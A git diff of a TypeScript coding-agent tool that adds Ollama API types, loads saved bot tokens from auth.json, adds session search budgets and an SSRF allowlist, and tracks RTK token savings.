+		if (!this.buffer) return [];
+
+		const result: ParsedChunk = {
+			type: this.inThinking ? "thinking" : "text",
+			text: this.buffer,
+		};
+		this.buffer = "";
+		return [result];
+	}
+
+	/**
+	 * Check if the end of input could be the start of a partial tag.
+	 * Only buffers when the tail of input matches a prefix of the tag.
+	 */
+	private couldBePartialTag(input: string, tag: string): boolean {
+		return this.getPartialTagTailLength(input, tag) > 0;
+	}
+
+	/**
+	 * Get the length of the tail of input that matches a prefix of the tag.
+	 * Returns 0 if no partial match.
+	 */
+	private getPartialTagTailLength(input: string, tag: string): number {
+		const maxCheck = Math.min(input.length, tag.length - 1);
+		for (let len = maxCheck; len >= 1; len--) {
+			const tail = input.slice(-len);
+			if (tag.startsWith(tail)) {
+				return len;
+			}
+		}
+		return 0;
+	}
+}
diff --git a/src/resources/extensions/ollama/types.ts b/src/resources/extensions/ollama/types.ts
new file mode 100644
index 000000000..51e9beb01
--- /dev/null
+++ b/src/resources/extensions/ollama/types.ts
@@ -0,0 +1,153 @@
+// GSD2 — Ollama API response types
+
+/**
+ * Type definitions for the Ollama REST API.
+ * Reference: https://github.com/ollama/ollama/blob/main/docs/api.md
+ */
+
+// ─── /api/tags ──────────────────────────────────────────────────────────────
+
+export interface OllamaModelDetails {
+	parent_model: string;
+	format: string;
+	family: string;
+	families: string[] | null;
+	parameter_size: string;
+	quantization_level: string;
+}
+
+export interface OllamaModelInfo {
+	name: string;
+	model: string;
+	modified_at: string;
+	size: number;
+	digest: string;
+	details: OllamaModelDetails;
+}
+
+export interface OllamaTagsResponse {
+	models: OllamaModelInfo[];
+}
+
+// ─── /api/show ──────────────────────────────────────────────────────────────
+
+export interface OllamaShowResponse {
+	modelfile: string;
+	parameters: string;
+	template: string;
+	details: OllamaModelDetails;
+	model_info: Record<string, unknown>;
+}
+
+// ─── /api/ps ────────────────────────────────────────────────────────────────
+
+export interface OllamaRunningModel {
+	name: string;
+	model: string;
+	size: number;
+	digest: string;
+	details: OllamaModelDetails;
+	expires_at: string;
+	size_vram: number;
+}
+
+export interface OllamaPsResponse {
+	models: OllamaRunningModel[];
+}
+
+// ─── /api/pull ──────────────────────────────────────────────────────────────
+
+export interface OllamaPullProgress {
+	status: string;
+	digest?: string;
+	total?: number;
+	completed?: number;
+}
+
+// ─── /api/version ───────────────────────────────────────────────────────────
+
+export interface OllamaVersionResponse {
+	version: string;
+}
+
+// ─── /api/chat ──────────────────────────────────────────────────────────────
+
+/** Per-model Ollama inference options carried via Model.providerOptions. */
+export interface OllamaChatOptions {
+	/** How long to keep the model loaded after the last request. e.g. "5m", "0" to unload. */
+	keep_alive?: string;
+	/** Number of GPU layers to offload. -1 = all. */
+	num_gpu?: number;
+	/** Override the context window for Ollama requests. Only sent when explicitly set. */
+	num_ctx?: number;
+	/** Sampling: top-k most likely tokens. Default: 40 */
+	top_k?: number;
+	/** Sampling: nucleus sampling threshold. */
+	top_p?: number;
+	/** Sampling: penalize repeating tokens. Default: 1.1 */
+	repeat_penalty?: number;
+	/** Sampling: fixed seed for reproducibility. */
+	seed?: number;
+}
+
+export interface OllamaChatMessage {
+	role: "system" | "user" | "assistant" | "tool";
+	content: string;
+	images?: string[];
+	tool_calls?: OllamaToolCall[];
+	/** Tool name — required for role: "tool" messages to correlate results with calls. */
+	name?: string;
+}
+
+export interface OllamaToolCall {
+	function: {
+		name: string;
+		arguments: Record<string, unknown>;
+	};
+}
+
+export interface OllamaTool {
+	type: "function";
+	function: {
+		name: string;
+		description: string;
+		parameters: {
+			type: "object";
+			required?: string[];
+			properties: Record<string, unknown>;
+		};
+	};
+}
+
+export interface OllamaChatRequest {
+	model: string;
+	messages: OllamaChatMessage[];
+	stream?: boolean;
+	tools?: OllamaTool[];
+	options?: {
+		num_ctx?: number;
+		num_predict?: number;
+		temperature?: number;
+		top_p?: number;
+		top_k?: number;
+		repeat_penalty?: number;
+		seed?: number;
+		stop?: string[];
+		num_gpu?: number;
+	};
+	keep_alive?: string;
+}
+
+export interface OllamaChatResponse {
+	model: string;
+	created_at: string;
+	message: OllamaChatMessage;
+	done: boolean;
+	done_reason?: string;
+	total_duration?: number;
+	load_duration?: number;
+	prompt_eval_count?: number;
+	prompt_eval_duration?: number;
+	eval_count?: number;
+	eval_duration?: number;
+}
diff --git a/src/resources/extensions/remote-questions/config.ts b/src/resources/extensions/remote-questions/config.ts
index 7e977e458..e34249601 100644
--- a/src/resources/extensions/remote-questions/config.ts
+++ b/src/resources/extensions/remote-questions/config.ts
@@ -2,6 +2,7 @@
  * Remote Questions — configuration resolution and validation
  */
 
+import { AuthStorage } from "@gsd/pi-coding-agent";
 import { loadEffectiveGSDPreferences, type RemoteQuestionsConfig } from "../gsd/preferences.js";
 import type { RemoteChannel } from "./types.js";
 
@@ -33,7 +34,48 @@ const MAX_TIMEOUT_MINUTES = 30;
 const MIN_POLL_INTERVAL_SECONDS = 2;
 const MAX_POLL_INTERVAL_SECONDS = 30;
 
+// Provider IDs in auth.json that correspond to remote channel env vars.
+const AUTH_PROVIDER_ENV_MAP: Record<string, string> = {
+  discord_bot: "DISCORD_BOT_TOKEN",
+  slack_bot: "SLACK_BOT_TOKEN",
+  telegram_bot: "TELEGRAM_BOT_TOKEN",
+};
+
+/**
+ * Populate remote channel env vars from auth.json when they are not already
+ * set in the environment. Called before every config resolution so that tokens
+ * saved via `/gsd remote discord` (or `/gsd keys add discord_bot`) survive
+ * process restarts without requiring the user to export env vars manually.
+ *
+ * Silently no-ops if auth.json is absent, unreadable, or malformed.
+ */
+function hydrateRemoteTokensFromAuth(): void {
+  const needed = Object.entries(AUTH_PROVIDER_ENV_MAP).filter(([, envVar]) => !process.env[envVar]);
+  if (needed.length === 0) return;
+
+  try {
+    const auth = AuthStorage.create();
+
+    for (const [providerId, envVar] of needed) {
+      try {
+        const creds = auth.getCredentialsForProvider(providerId);
+        const apiKeyCred = creds.find((c: { type: string; key?: string }) => c.type === "api_key" && !!c.key) as
+          | { type: "api_key"; key: string }
+          | undefined;
+        if (apiKeyCred?.key) {
+          process.env[envVar] = apiKeyCred.key;
+        }
+      } catch {
+        // Per-provider failure is non-fatal — skip and move on.
+      }
+    }
+  } catch {
+    // AuthStorage unavailable or auth.json missing/unreadable — skip silently.
+  }
+}
+
 export function resolveRemoteConfig(): ResolvedConfig | null {
+  hydrateRemoteTokensFromAuth();
   const prefs = loadEffectiveGSDPreferences();
   const rq: RemoteQuestionsConfig | undefined = prefs?.preferences.remote_questions;
   if (!rq || !rq.channel || !rq.channel_id) return null;
@@ -58,6 +100,7 @@ export function resolveRemoteConfig(): ResolvedConfig | null {
 }
 
 export function getRemoteConfigStatus(): string {
+  hydrateRemoteTokensFromAuth();
   const prefs = loadEffectiveGSDPreferences();
   const rq: RemoteQuestionsConfig | undefined = prefs?.preferences.remote_questions;
   if (!rq || !rq.channel || !rq.channel_id) return "Remote questions: not configured";
diff --git a/src/resources/extensions/remote-questions/manager.ts b/src/resources/extensions/remote-questions/manager.ts
index a1e1d10f7..338e354f1 100644
--- a/src/resources/extensions/remote-questions/manager.ts
+++ b/src/resources/extensions/remote-questions/manager.ts
@@ -24,6 +24,15 @@ interface QuestionInput {
   allowMultiple?: boolean;
 }
 
+/**
+ * Check whether a remote channel is configured without triggering any
+ * side effects (no HTTP requests, no prompt records). Used by the race
+ * logic to decide routing before committing to a remote dispatch.
+ */
+export function isRemoteConfigured(): boolean {
+  return resolveRemoteConfig() !== null;
+}
+
 export async function tryRemoteQuestions(
   questions: QuestionInput[],
   signal?: AbortSignal,
diff --git a/src/resources/extensions/remote-questions/remote-command.ts b/src/resources/extensions/remote-questions/remote-command.ts
index 6934d534a..ea5278904 100644
--- a/src/resources/extensions/remote-questions/remote-command.ts
+++ b/src/resources/extensions/remote-questions/remote-command.ts
@@ -312,7 +312,7 @@ function saveProviderToken(provider: string, token: string): void {
 
 function removeProviderToken(provider: string): void {
   const auth = getAuthStorage();
-  auth.set(provider, { type: "api_key", key: "" });
+  auth.remove(provider);
 }
 
 export function saveRemoteQuestionsConfig(channel: "slack" | "discord" | "telegram", channelId: string): void {
diff --git a/src/resources/extensions/search-the-web/extension-manifest.json b/src/resources/extensions/search-the-web/extension-manifest.json
index 582c341d8..b17107d76 100644
--- a/src/resources/extensions/search-the-web/extension-manifest.json
+++ b/src/resources/extensions/search-the-web/extension-manifest.json
@@ -8,6 +8,6 @@
   "provides": {
     "tools": ["search-the-web", "fetch_page", "search_and_read", "web_search"],
     "commands": ["search-provider"],
-    "hooks": ["model_select", "before_provider_request"]
+    "hooks": ["session_start", "model_select", "before_provider_request"]
   }
 }
diff --git a/src/resources/extensions/search-the-web/native-search.ts b/src/resources/extensions/search-the-web/native-search.ts
index a153f8cc3..5debc2b1b 100644
--- a/src/resources/extensions/search-the-web/native-search.ts
+++ b/src/resources/extensions/search-the-web/native-search.ts
@@ -28,7 +28,7 @@ export const MAX_NATIVE_SEARCHES_PER_SESSION = 15;
 
 /** When true, skip native web search injection and keep Brave/custom tools active on Anthropic. */
 export function preferBraveSearch(): boolean {
-  // preferences.md takes priority over env var
+  // PREFERENCES.md takes priority over env var
   const prefsPref = resolveSearchProviderFromPreferences();
   if (prefsPref === "brave" || prefsPref === "tavily" || prefsPref === "ollama") return true;
   if (prefsPref === "native") return false;
@@ -176,11 +176,15 @@ export function registerNativeSearchHooks(pi: NativeSearchPI): { getIsAnthropic:
     );
     payload.tools = tools;
 
-    // ── Session-level search budget (#1309) ──────────────────────────────
+    // ── Session-level search budget (#1309, #compaction-safe) ─────────────
     // Count web_search_tool_result blocks in the conversation history to
     // determine how many native searches have already been used this session.
     // The Anthropic API's max_uses resets per request, so without this guard,
     // pause_turn → resubmit cycles allow unlimited total searches.
+    //
+    // Use the monotonic high-water mark: take the max of the history count
+    // and the running counter. This prevents budget resets when context
+    // compaction removes web_search_tool_result blocks from history.
     if (Array.isArray(messages)) {
       let historySearchCount = 0;
       for (const msg of messages) {
@@ -192,8 +196,9 @@ export function registerNativeSearchHooks(pi: NativeSearchPI): { getIsAnthropic:
           }
         }
       }
-      // Sync counter from history (handles session restore / context replay)
-      sessionSearchCount = historySearchCount;
+      // High-water mark: never decrease the counter, even if compaction
+      // removes web_search_tool_result blocks from the visible history.
+      sessionSearchCount = Math.max(sessionSearchCount, historySearchCount);
     }
 
     const remaining = Math.max(0, MAX_NATIVE_SEARCHES_PER_SESSION - sessionSearchCount);
diff --git a/src/resources/extensions/search-the-web/provider.ts b/src/resources/extensions/search-the-web/provider.ts
index e1f8b2312..cf7ae5b98 100644
--- a/src/resources/extensions/search-the-web/provider.ts
+++ b/src/resources/extensions/search-the-web/provider.ts
@@ -105,7 +105,7 @@ export function resolveSearchProvider(overridePreference?: string): SearchProvid
   if (overridePreference && VALID_PREFERENCES.has(overridePreference)) {
     pref = overridePreference as SearchProviderPreference
   } else {
-    // preferences.md takes priority over auth.json
+    // PREFERENCES.md takes priority over auth.json
     const mdPref = resolveSearchProviderFromPreferences()
     if (mdPref && mdPref !== 'auto' && mdPref !== 'native') {
       pref = mdPref as SearchProviderPreference
diff --git a/src/resources/extensions/search-the-web/tool-search.ts b/src/resources/extensions/search-the-web/tool-search.ts
index 54dab89b0..e645a502f 100644
--- a/src/resources/extensions/search-the-web/tool-search.ts
+++ b/src/resources/extensions/search-the-web/tool-search.ts
@@ -106,14 +106,20 @@ searchCache.startPurgeInterval(60_000);
 
 // Consecutive duplicate search guard (#949)
 // Tracks recent query keys to detect and break search loops.
-const MAX_CONSECUTIVE_DUPES = 3;
+const MAX_CONSECUTIVE_DUPES = 1;
 let lastSearchKey = "";
 let consecutiveDupeCount = 0;
 
-/** Reset session-scoped duplicate-search guard state. */
+// Session-level total search budget (all queries, not just duplicates).
+// Prevents unbounded search accumulation across varied queries.
+const MAX_SEARCHES_PER_SESSION = 15;
+let sessionTotalSearches = 0;
+
+/** Reset session-scoped search guard state (both duplicate and budget). */
 export function resetSearchLoopGuardState(): void {
   lastSearchKey = "";
   consecutiveDupeCount = 0;
+  sessionTotalSearches = 0;
 }
 
 // Summarizer responses: max 50 entries, 15-minute TTL
@@ -357,6 +363,17 @@ export function registerSearchTool(pi: ExtensionAPI) {
         };
       }
 
+      // ------------------------------------------------------------------
+      // Session-level search budget
+      // ------------------------------------------------------------------
+      if (sessionTotalSearches >= MAX_SEARCHES_PER_SESSION) {
+        return {
+          content: [{ type: "text" as const, text: `⚠️ Search budget exhausted: ${sessionTotalSearches}/${MAX_SEARCHES_PER_SESSION} searches used this session. The information you need should already be in previous search results. Stop searching and use those results to proceed with your task.` }],
+          isError: true,
+          details: { errorKind: "budget_exhausted", error: `Session search budget exhausted (${MAX_SEARCHES_PER_SESSION})` } satisfies Partial<SearchDetails>,
+        };
+      }
+
       const count = params.count ?? 5;
       const wantSummary = params.summary ?? false;
 
@@ -398,18 +415,21 @@ export function registerSearchTool(pi: ExtensionAPI) {
       // with brief interruptions every MAX_CONSECUTIVE_DUPES+1 calls.
       if (cacheKey === lastSearchKey) {
         consecutiveDupeCount++;
-        if (consecutiveDupeCount >= MAX_CONSECUTIVE_DUPES) {
+        if (consecutiveDupeCount > MAX_CONSECUTIVE_DUPES) {
           return {
-            content: [{ type: "text" as const, text: `⚠️ Search loop detected: the query "${params.query}" has been searched ${consecutiveDupeCount + 1} times consecutively with identical results. The information you need is already in the previous search results above. Stop searching and use those results to proceed with your task.` }],
+            content: [{ type: "text" as const, text: `⚠️ Search loop detected: the query "${params.query}" has been searched ${consecutiveDupeCount} times consecutively with identical results. The information you need is already in the previous search results above. Stop searching and use those results to proceed with your task.` }],
             isError: true,
             details: { errorKind: "search_loop", error: "Consecutive duplicate search detected" } satisfies Partial<SearchDetails>,
           };
         }
       } else {
         lastSearchKey = cacheKey;
-        consecutiveDupeCount = 0;
+        consecutiveDupeCount = 1;
       }
 
+      // Count every search that passes the guards toward the session budget.
+      sessionTotalSearches++;
+
       const cached = searchCache.get(cacheKey);
 
       if (cached) {
diff --git a/src/resources/extensions/search-the-web/url-utils.ts b/src/resources/extensions/search-the-web/url-utils.ts
index 24b3caedd..fca98e173 100644
--- a/src/resources/extensions/search-the-web/url-utils.ts
+++ b/src/resources/extensions/search-the-web/url-utils.ts
@@ -21,11 +21,30 @@ const PRIVATE_IP_PATTERNS = [
   /^fe80:/i,
 ];
 
+/**
+ * Hostnames exempted from SSRF blocking. Set via setFetchAllowedUrls()
+ * from global settings.json or GSD_FETCH_ALLOWED_URLS env var.
+ */
+let fetchAllowedHostnames: Set<string> = new Set();
+
+/**
+ * Replace the fetch URL allowlist (hostnames exempted from SSRF checks).
+ */
+export function setFetchAllowedUrls(hostnames: string[]): void {
+  fetchAllowedHostnames = new Set(hostnames.map((h) => h.toLowerCase()));
+}
+
+/** Get the currently active fetch URL allowlist. */
+export function getFetchAllowedUrls(): readonly string[] {
+  return [...fetchAllowedHostnames];
+}
+
 export function isBlockedUrl(url: string): boolean {
   try {
     const parsed = new URL(url);
     if (parsed.protocol !== "https:" && parsed.protocol !== "http:") return true;
     const hostname = parsed.hostname.toLowerCase();
+    if (fetchAllowedHostnames.has(hostname)) return false;
     if (BLOCKED_HOSTNAMES.has(hostname)) return true;
     for (const pattern of PRIVATE_IP_PATTERNS) {
       if (pattern.test(hostname)) return true;
diff --git a/src/resources/extensions/shared/format-utils.ts b/src/resources/extensions/shared/format-utils.ts
index 122d122bd..226cb4cac 100644
--- a/src/resources/extensions/shared/format-utils.ts
+++ b/src/resources/extensions/shared/format-utils.ts
@@ -11,7 +11,7 @@
 
 /** Format a millisecond duration as a compact human-readable string. */
 export function formatDuration(ms: number): string {
-  if (ms < 1000) return `${ms}ms`;
+  if (ms > 0 && ms < 1000) return `${ms}ms`;
   const s = Math.floor(ms / 1000);
   if (s < 60) return `${s}s`;
   const m = Math.floor(s / 60);
diff --git a/src/resources/extensions/shared/interview-ui.ts b/src/resources/extensions/shared/interview-ui.ts
index 823568330..66771bc84 100644
--- a/src/resources/extensions/shared/interview-ui.ts
+++ b/src/resources/extensions/shared/interview-ui.ts
@@ -80,6 +80,12 @@ export interface InterviewRoundOptions {
 	 * Label for the Esc-confirm overlay header. Defaults to "End interview?".
 	 */
 	exitHeadline?: string;
+	/**
+	 * Optional AbortSignal to cancel the interview externally (e.g. when racing
+	 * against a remote question channel). When aborted, the TUI closes and the
+	 * promise resolves with an empty answers object.
+	 */
+	signal?: AbortSignal;
 	/**
 	 * Text for the "exit" hint shown in the review screen footer and exit confirm overlay.
 	 * Defaults to "end interview".
@@ -105,7 +111,7 @@ export interface WrapUpOptions {
 // ─── Constants ────────────────────────────────────────────────────────────────
 
 const OTHER_OPTION_LABEL = "None of the above";
-const OTHER_OPTION_DESCRIPTION = "Press TAB to add optional notes.";
+const OTHER_OPTION_DESCRIPTION = "Select to type your own answer.";
 
 // ─── Wrap-up screen ───────────────────────────────────────────────────────────
 
@@ -207,6 +213,13 @@ export async function showInterviewRound(
 		let exitCursor = 0; // 0 = keep going (default), 1 = end interview
 		let cachedLines: string[] | undefined;
 
+		// External cancellation (e.g. remote channel won the race)
+		if (opts.signal) {
+			const onAbort = () => done({ endInterview: false, answers: {} });
+			if (opts.signal.aborted) { onAbort(); }
+			else { opts.signal.addEventListener("abort", onAbort, { once: true }); }
+		}
+
 		// Editor is created once; editorTheme comes from the design system
 		const editorRef = { current: null as Editor | null };
 
@@ -295,6 +308,19 @@ export async function showInterviewRound(
 				states[currentIdx].committedIndex = states[currentIdx].cursorIndex;
 			}
 
+			// Auto-open the notes field when "None of the above" is selected
+			// so the user can immediately provide a free-text explanation
+			// instead of being trapped in a re-asking loop (bug #2715).
+			// Only auto-open if the user hasn't already provided notes —
+			// otherwise Enter from notes mode loops back here endlessly.
+			if (!isMultiSelect(currentIdx) && states[currentIdx].cursorIndex === noneOrDoneIdx(currentIdx) && !states[currentIdx].notes && !states[currentIdx].notesVisible) {
+				states[currentIdx].notesVisible = true;
+				focusNotes = true;
+				loadStateToEditor();
+				refresh();
+				return;
+			}
+
 			if (isMultiQuestion && currentIdx < questions.length - 1) {
 				let next = currentIdx + 1;
 				for (let i = 0; i < questions.length; i++) {
diff --git a/src/resources/extensions/shared/rtk-session-stats.ts b/src/resources/extensions/shared/rtk-session-stats.ts
new file mode 100644
index 000000000..4de3ae0dd
--- /dev/null
+++ b/src/resources/extensions/shared/rtk-session-stats.ts
@@ -0,0 +1,249 @@
+import { spawnSync } from "node:child_process";
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+
+import { gsdRoot } from "../gsd/paths.js";
+import { formatTokenCount } from "./format-utils.js";
+import { buildRtkEnv, isRtkEnabled, resolveRtkBinaryPath } from "./rtk.js";
+
+const SESSION_BASELINES_FILE = "rtk-session-baselines.json";
+const CURRENT_SUMMARY_TTL_MS = 15_000;
+const CURRENT_SUMMARY_TIMEOUT_MS = 5_000;
+const MAX_BASELINE_SESSIONS = 200;
+
+export interface RtkGainSummary {
+  totalCommands: number;
+  totalInput: number;
+  totalOutput: number;
+  totalSaved: number;
+  avgSavingsPct: number;
+  totalTimeMs: number;
+  avgTimeMs: number;
+}
+
+export interface RtkSessionSavings {
+  commands: number;
+  inputTokens: number;
+  outputTokens: number;
+  savedTokens: number;
+  savingsPct: number;
+  totalTimeMs: number;
+  avgTimeMs: number;
+  updatedAt: string;
+}
+
+interface BaselineEntry {
+  summary: RtkGainSummary;
+  createdAt: string;
+  updatedAt: string;
+}
+
+interface BaselineStore {
+  version: 1;
+  sessions: Record<string, BaselineEntry>;
+}
+
+let cachedSummary: { at: number; binaryPath: string; summary: RtkGainSummary | null } | null = null;
+
+function getRuntimeDir(basePath: string): string {
+  return join(gsdRoot(basePath), "runtime");
+}
+
+function getBaselinesPath(basePath: string): string {
+  return join(getRuntimeDir(basePath), SESSION_BASELINES_FILE);
+}
+
+function defaultStore(): BaselineStore {
+  return { version: 1, sessions: {} };
+}
+
+function loadBaselineStore(basePath: string): BaselineStore {
+  const path = getBaselinesPath(basePath);
+  if (!existsSync(path)) return defaultStore();
+  try {
+    const parsed = JSON.parse(readFileSync(path, "utf-8")) as Partial<BaselineStore>;
+    if (parsed.version !== 1 || typeof parsed.sessions !== "object" || parsed.sessions === null) {
+      return defaultStore();
+    }
+    return {
+      version: 1,
+      sessions: parsed.sessions as Record<string, BaselineEntry>,
+    };
+  } catch {
+    return defaultStore();
+  }
+}
+
+function saveBaselineStore(basePath: string, store: BaselineStore): void {
+  const runtimeDir = getRuntimeDir(basePath);
+  mkdirSync(runtimeDir, { recursive: true });
+
+  const entries = Object.entries(store.sessions)
+    .sort((left, right) => right[1].updatedAt.localeCompare(left[1].updatedAt))
+    .slice(0, MAX_BASELINE_SESSIONS);
+
+  const normalized: BaselineStore = {
+    version: 1,
+    sessions: Object.fromEntries(entries),
+  };
+
+  writeFileSync(getBaselinesPath(basePath), JSON.stringify(normalized, null, 2), "utf-8");
+}
+
+function normalizeSummary(raw: unknown): RtkGainSummary | null {
+  if (!raw || typeof raw !== "object") return null;
+  const summary = raw as Record<string, unknown>;
+  return {
+    totalCommands: Number(summary.total_commands ?? 0),
+    totalInput: Number(summary.total_input ?? 0),
+    totalOutput: Number(summary.total_output ?? 0),
+    totalSaved: Number(summary.total_saved ?? 0),
+    avgSavingsPct: Number(summary.avg_savings_pct ?? 0),
+    totalTimeMs: Number(summary.total_time_ms ?? 0),
+    avgTimeMs: Number(summary.avg_time_ms ?? 0),
+  };
+}
+
+export function readCurrentRtkGainSummary(env: NodeJS.ProcessEnv = process.env): RtkGainSummary | null {
+  if (!isRtkEnabled(env)) return null;
+
+  const binaryPath = resolveRtkBinaryPath({ env });
+  if (!binaryPath) return null;
+
+  if (
+    cachedSummary &&
+    cachedSummary.binaryPath === binaryPath &&
+    Date.now() - cachedSummary.at < CURRENT_SUMMARY_TTL_MS
+  ) {
+    return cachedSummary.summary;
+  }
+
+  const result = spawnSync(binaryPath, ["gain", "--all", "--format", "json"], {
+    encoding: "utf-8",
+    env: buildRtkEnv(env),
+    stdio: ["ignore", "pipe", "ignore"],
+    timeout: CURRENT_SUMMARY_TIMEOUT_MS,
+    // .cmd/.bat wrappers (used by fake-rtk in tests) require shell:true on Windows
+    shell: /\.(cmd|bat)$/i.test(binaryPath),
+  });
+
+  if (result.error || result.status !== 0) {
+    cachedSummary = { at: Date.now(), binaryPath, summary: null };
+    return null;
+  }
+
+  try {
+    const parsed = JSON.parse(result.stdout ?? "{}") as { summary?: unknown };
+    const summary = normalizeSummary(parsed.summary ?? null);
+    cachedSummary = { at: Date.now(), binaryPath, summary };
+    return summary;
+  } catch {
+    cachedSummary = { at: Date.now(), binaryPath, summary: null };
+    return null;
+  }
+}
+
+function computeSavingsDelta(current: RtkGainSummary, baseline: RtkGainSummary): RtkSessionSavings {
+  const commands = Math.max(0, current.totalCommands - baseline.totalCommands);
+  const inputTokens = Math.max(0, current.totalInput - baseline.totalInput);
+  const outputTokens = Math.max(0, current.totalOutput - baseline.totalOutput);
+  const savedTokens = Math.max(0, current.totalSaved - baseline.totalSaved);
+  const totalTimeMs = Math.max(0, current.totalTimeMs - baseline.totalTimeMs);
+  const avgTimeMs = commands > 0 ? Math.round(totalTimeMs / commands) : 0;
+  const savingsPct = inputTokens > 0 ? (savedTokens / inputTokens) * 100 : 0;
+
+  return {
+    commands,
+    inputTokens,
+    outputTokens,
+    savedTokens,
+    savingsPct,
+    totalTimeMs,
+    avgTimeMs,
+    updatedAt: new Date().toISOString(),
+  };
+}
+
+export function ensureRtkSessionBaseline(
+  basePath: string,
+  sessionId: string,
+  env: NodeJS.ProcessEnv = process.env,
+): RtkGainSummary | null {
+  if (!sessionId) return null;
+
+  const current = readCurrentRtkGainSummary(env);
+  if (!current) return null;
+
+  const store = loadBaselineStore(basePath);
+  const existing = store.sessions[sessionId];
+  if (existing) return existing.summary;
+
+  const now = new Date().toISOString();
+  store.sessions[sessionId] = {
+    summary: current,
+    createdAt: now,
+    updatedAt: now,
+  };
+  saveBaselineStore(basePath, store);
+  return current;
+}
+
+export function getRtkSessionSavings(
+  basePath: string,
+  sessionId: string | null | undefined,
+  env: NodeJS.ProcessEnv = process.env,
+): RtkSessionSavings | null {
+  if (!sessionId) return null;
+
+  const current = readCurrentRtkGainSummary(env);
+  if (!current) return null;
+
+  const store = loadBaselineStore(basePath);
+  const existing = store.sessions[sessionId];
+  if (!existing) {
+    const now = new Date().toISOString();
+    store.sessions[sessionId] = {
+      summary: current,
+      createdAt: now,
+      updatedAt: now,
+    };
+    saveBaselineStore(basePath, store);
+    return computeSavingsDelta(current, current);
+  }
+
+  if (
+    current.totalCommands < existing.summary.totalCommands ||
+    current.totalInput < existing.summary.totalInput ||
+    current.totalSaved < existing.summary.totalSaved
+  ) {
+    const now = new Date().toISOString();
+    store.sessions[sessionId] = {
+      summary: current,
+      createdAt: existing.createdAt,
+      updatedAt: now,
+    };
+    saveBaselineStore(basePath, store);
+    return computeSavingsDelta(current, current);
+  }
+
+  existing.updatedAt = new Date().toISOString();
+  saveBaselineStore(basePath, store);
+  return computeSavingsDelta(current, existing.summary);
+}
+
+export function clearRtkSessionBaseline(basePath: string, sessionId: string): void {
+  if (!sessionId) return;
+  const store = loadBaselineStore(basePath);
+  if (!(sessionId in store.sessions)) return;
+  delete store.sessions[sessionId];
+  saveBaselineStore(basePath, store);
+}
+
+export function formatRtkSavingsLabel(savings: RtkSessionSavings | null | undefined): string | null {
+  if (!savings) return null;
+  if (savings.commands <= 0) return "rtk: waiting for shell usage";
+  if (savings.inputTokens <= 0 && savings.outputTokens <= 0) {
+    return `rtk: active (${savings.commands} cmd${savings.commands === 1 ? "" : "s"})`;
+  }
+  return `rtk: ${formatTokenCount(savings.savedTokens)} saved (${Math.round(savings.savingsPct)}%)`;
+}
diff --git a/src/resources/extensions/shared/rtk.ts b/src/resources/extensions/shared/rtk.ts
new file mode 100644
index 000000000..33bcb6609
--- /dev/null
+++ b/src/resources/extensions/shared/rtk.ts
@@ -0,0 +1,138 @@
+import { spawnSync } from "node:child_process";
+import { existsSync } from "node:fs";
+import { homedir } from "node:os";
+import { delimiter, join } from "node:path";
+
+const GSD_RTK_PATH_ENV = "GSD_RTK_PATH";
+const GSD_RTK_DISABLED_ENV = "GSD_RTK_DISABLED";
+const GSD_RTK_REWRITE_TIMEOUT_MS_ENV = "GSD_RTK_REWRITE_TIMEOUT_MS";
+const RTK_TELEMETRY_DISABLED_ENV = "RTK_TELEMETRY_DISABLED";
+const RTK_REWRITE_TIMEOUT_MS = 5_000;
+
+function isTruthy(value: string | undefined): boolean {
+  if (!value) return false;
+  const normalized = value.trim().toLowerCase();
+  return normalized === "1" || normalized === "true" || normalized === "yes";
+}
+
+function getRewriteTimeoutMs(env: NodeJS.ProcessEnv = process.env): number {
+  const configured = Number.parseInt(env[GSD_RTK_REWRITE_TIMEOUT_MS_ENV] ?? "", 10);
+  if (Number.isFinite(configured) && configured > 0) {
+    return configured;
+  }
+  return RTK_REWRITE_TIMEOUT_MS;
+}
+
+export function isRtkEnabled(env: NodeJS.ProcessEnv = process.env): boolean {
+  return !isTruthy(env[GSD_RTK_DISABLED_ENV]);
+}
+
+export function buildRtkEnv(env: NodeJS.ProcessEnv = process.env): NodeJS.ProcessEnv {
+  return {
+    ...env,
+    [RTK_TELEMETRY_DISABLED_ENV]: "1",
+  };
+}
+
+function getManagedRtkDir(env: NodeJS.ProcessEnv = process.env): string {
+  return join(env.GSD_HOME || join(homedir(), ".gsd"), "agent", "bin");
+}
+
+function getRtkBinaryName(platform: NodeJS.Platform = process.platform): string {
+  return platform === "win32" ? "rtk.exe" : "rtk";
+}
+
+function getPathValue(env: NodeJS.ProcessEnv): string | undefined {
+  const pathKey = Object.keys(env).find((key) => key.toLowerCase() === "path");
+  return pathKey ? env[pathKey] : env.PATH;
+}
+
+function resolvePathCandidates(pathValue: string | undefined): string[] {
+  if (!pathValue) return [];
+  return pathValue
+    .split(delimiter)
+    .map((part) => part.trim())
+    .filter(Boolean);
+}
+
+function resolveSystemRtkPath(pathValue: string | undefined, platform: NodeJS.Platform = process.platform): string | null {
+  const candidates = platform === "win32"
+    ? ["rtk.exe", "rtk.cmd", "rtk.bat", "rtk"]
+    : ["rtk"];
+
+  for (const dir of resolvePathCandidates(pathValue)) {
+    for (const candidate of candidates) {
+      const fullPath = join(dir, candidate);
+      if (existsSync(fullPath)) {
+        return fullPath;
+      }
+    }
+  }
+
+  return null;
+}
+
+export interface ResolveRtkBinaryPathOptions {
+  binaryPath?: string;
+  env?: NodeJS.ProcessEnv;
+  pathValue?: string;
+  platform?: NodeJS.Platform;
+}
+
+export function resolveRtkBinaryPath(options: ResolveRtkBinaryPathOptions = {}): string | null {
+  const env = options.env ?? process.env;
+  const platform = options.platform ?? process.platform;
+
+  const explicitPath = options.binaryPath ?? env[GSD_RTK_PATH_ENV];
+  if (explicitPath && existsSync(explicitPath)) {
+    return explicitPath;
+  }
+
+  const managedDir = getManagedRtkDir(env);
+  const managedPath = join(managedDir, getRtkBinaryName(platform));
+  if (existsSync(managedPath)) {
+    return managedPath;
+  }
+  // On Windows, also check for rtk.cmd in the managed dir (used by test fake RTK
+  // and any wrapper-style installs where a .cmd launcher accompanies the binary).
+  if (platform === "win32") {
+    const managedCmd = join(managedDir, "rtk.cmd");
+    if (existsSync(managedCmd)) {
+      return managedCmd;
+    }
+  }
+
+  return resolveSystemRtkPath(options.pathValue ?? getPathValue(env), platform);
+}
+
+interface RewriteCommandOptions {
+  binaryPath?: string;
+  env?: NodeJS.ProcessEnv;
+  spawnSyncImpl?: typeof spawnSync;
+}
+
+export function rewriteCommandWithRtk(command: string, options: RewriteCommandOptions = {}): string {
+  const env = options.env ?? process.env;
+
